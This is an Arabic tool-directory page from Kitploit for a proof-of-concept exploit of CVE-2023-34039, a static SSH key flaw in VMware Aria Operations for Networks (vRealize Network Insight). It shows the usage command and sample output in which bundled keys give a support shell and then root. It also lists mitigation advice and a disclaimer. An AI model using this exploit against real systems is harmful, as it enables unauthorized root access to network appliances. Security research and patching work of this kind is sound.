Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-34039 — استغلال VMware | Kitploit
أدوات/GitHubGitHub/charondefalt/cve-2023-34039
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأمن السحابةأداة الوصول عن بعد
GitHubcharondefalt/cve-2023-34039

CVE-2023-34039

استغلال VMware

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-34039

POC لـ CVE-2023-34039 VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE

التحليل الفني

يمكن العثور على تحليل السبب الجذري للثغرة في مدونتي:

https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/

poc

ملخص

لم يقم VMWare Aria Operations for Networks (vRealize Network Insight) من الإصدار 6.0 إلى 6.10 بإعادة إنشاء مفاتيح SSH للمستخدمين support و ubuntu، مما يسمح للمهاجم الذي لديه وصول SSH بالحصول على وصول إلى شل root لهذا المنتج.

تم الإبلاغ عن هذه المشكلة لـ VMWare بواسطة Harsh Jaiswal (@rootxharsh) و Rahul Maini (@iamnoooob) في ProjectDiscovery Research

لقد كتبت فقط الاستغلال، إذا كان يمكنك تسميته كذلك، لأنه في الأساس غلاف لأوامر ssh.

الاستخدام

root@kitploit:~
python CVE-2023-34039.py --target 192.168.1.16
(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)

(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)

(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_collector

(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_platform

(*) Trying key: keys/vrni-6.10.0/id_rsa_vnera_keypair_6.10.0_platform


********************************** ATTENTION **********************************
 NTP Service is not healthy.
 IMPACT: It may affect the proper working of other services.
 ACTION: Restore the service using 'ntp' CLI command.
********************************** ATTENTION **********************************
support@vrni-platform-release:~$ sudo -i
root@vrni-platform-release:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vrni-platform-release:~# hostname
vrni-platform-release
root@vrni-platform-release:~# 

التخفيفات

قم بالتحديث إلى أحدث إصدار أو خفف من المشكلة باتباع التعليمات الموجودة في Progress Advisory

  • https://www.vmware.com/security/advisories/VMSA-2023-0018.html

تابعونا لمزيد من أبحاث الأمن:

  • SinSinology
  • SummoningTeam

إخلاء مسؤولية

تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي ولتطوير تقنيات دفاعية فعالة فقط، وليس المقصود استخدامه لمهاجمة الأنظمة إلا حيثما يُصرح بذلك صراحةً. القائمون على المشروع ليسوا مسؤولين عن سوء استخدام البرنامج. استخدمه بمسؤولية.

تنزيل الأداة